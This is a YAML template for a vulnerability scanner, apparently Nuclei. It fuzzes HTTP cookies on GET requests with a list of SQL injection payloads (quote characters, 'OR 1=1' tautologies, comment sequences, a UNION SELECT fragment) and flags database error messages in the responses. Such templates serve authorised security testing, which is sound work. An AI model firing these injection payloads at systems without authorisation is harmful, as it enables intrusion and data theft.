1
id: cookie-fuzzing-error-sqli
2

3
info:
4
  name: fuzzing error sqli payloads in cookie
5
  author: pdteam
6
  severity: info
7
  description: |
8
    This template attempts to find SQL injection vulnerabilities by fuzzing http cookies with SQL injection payloads.
9
    Note: this is example template, and payloads/matchers need to be modified appropriately.
10

11
http:
12
  - pre-condition:
13
      - type: dsl
14
        dsl:
15
          - 'method == "GET"'
16
          -  len(cookie) > 0
17
        condition: and
18
    
19
    payloads:
20
      sqli:
21
        - "'"
22
        - ''
23
        - '`'
24
        - '``'
25
        - ','
26
        - '"'
27
        - ""
28
        - /
29
        - //
30
        - \
31
        - \\
32
        - ;
33
        - -- or # 
34
        - '" OR 1 = 1 -- -'
35
        - ' OR '' = '
36
        - '='
37
        - 'LIKE'
38
        - "'=0--+"
39
        -  OR 1=1
40
        - "' OR 'x'='x"
41
        - "' AND id IS NULL; --"
42
        - "'''''''''''''UNION SELECT '2"
43
        - '%00'
44
    
45
    fuzzing:
46
      - part: cookie
47
        type: postfix
48
        mode: single
49
        fuzz:
50
          - '{{sqli}}'
51
  
52
    stop-at-first-match: true
53
    matchers:
54
      - type: word
55
        words:
56
          - "unrecognized token:"
57
          - "syntax error"
58
          - "null"
59
          - "SELECTs to the left and right of UNION do not have the same number of result columns"
60

61